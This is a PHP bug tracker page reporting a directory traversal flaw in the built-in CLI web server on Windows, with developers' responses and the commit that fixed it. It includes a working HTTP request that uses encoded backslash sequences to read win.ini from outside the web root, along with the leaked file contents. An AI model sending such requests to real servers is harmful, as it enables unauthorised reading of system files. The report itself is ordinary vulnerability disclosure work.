php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Bug #70264 CLI server directory traversal
Submitted: 2015-08-14 00:05 UTC Modified: 2015-08-14 11:34 UTC
From: jplopezy at gmail dot com Assigned: cmb (profile)
Status: Closed Package: Built-in web server
PHP Version: 5.6.12 OS: Windows only
Private report: No CVE-ID: None
View Developer Edit
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: jplopezy at gmail dot com
New email:
PHP Version: OS:

 

 [2015-08-14 00:05 UTC] jplopezy at gmail dot com 
Description:
------------
The bug is in the local php web server for testing (http://php.net/manual/es/features.commandline.webserver.php)

This readme says that this webserver is only for testing, but maybe in a lan this issue allow to steal files from the devolverps, or maybe some other people use in production this web server in php.





Test script:
---------------
Only you need send this request

GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1
Host: 127.0.0.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*




Expected result:
----------------
Don't display files that escape from the webserver directory.

Actual result:
--------------
Response with my win.ini


; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
CMCDLLNAME32=mapi32.dll
CMC=1
MAPIX=1
MAPIXVER=1.0.0.1
OLEMessaging=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2015-08-14 00:16 UTC] stas@php.net
-Type: Security +Type: Bug
 [2015-08-14 00:16 UTC] stas@php.net 
CLI server is a debugging server so should not be used in production context.
 [2015-08-14 11:34 UTC] cmb@php.net
-Summary: PHP 5.6.12 directory traversal +Summary: CLI server directory traversal -Status: Open +Status: Verified -Package: HTTP related +Package: Built-in web server -Operating System: Windows 7 +Operating System: Windows only -Assigned To: +Assigned To: cmb
 [2015-08-14 15:20 UTC] cmb@php.net 
Automatic comment on behalf of cmb
Revision: http://git.php.net/?p=php-src.git;a=commit;h=9c805a6cb31596c41609512bdd8a9a76c9ce9b15
Log: Fix #70264: CLI server directory traversal
 [2015-08-14 15:20 UTC] cmb@php.net
-Status: Verified +Status: Closed
 [2015-08-14 15:21 UTC] cmb@php.net 
Automatic comment on behalf of cmb
Revision: http://git.php.net/?p=php-src.git;a=commit;h=9c805a6cb31596c41609512bdd8a9a76c9ce9b15
Log: Fix #70264: CLI server directory traversal
 [2015-08-18 16:24 UTC] ab@php.net 
Automatic comment on behalf of cmb
Revision: http://git.php.net/?p=php-src.git;a=commit;h=9c805a6cb31596c41609512bdd8a9a76c9ce9b15
Log: Fix #70264: CLI server directory traversal
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved. 		Last updated: Tue Dec 03 17:01:29 2024 UTC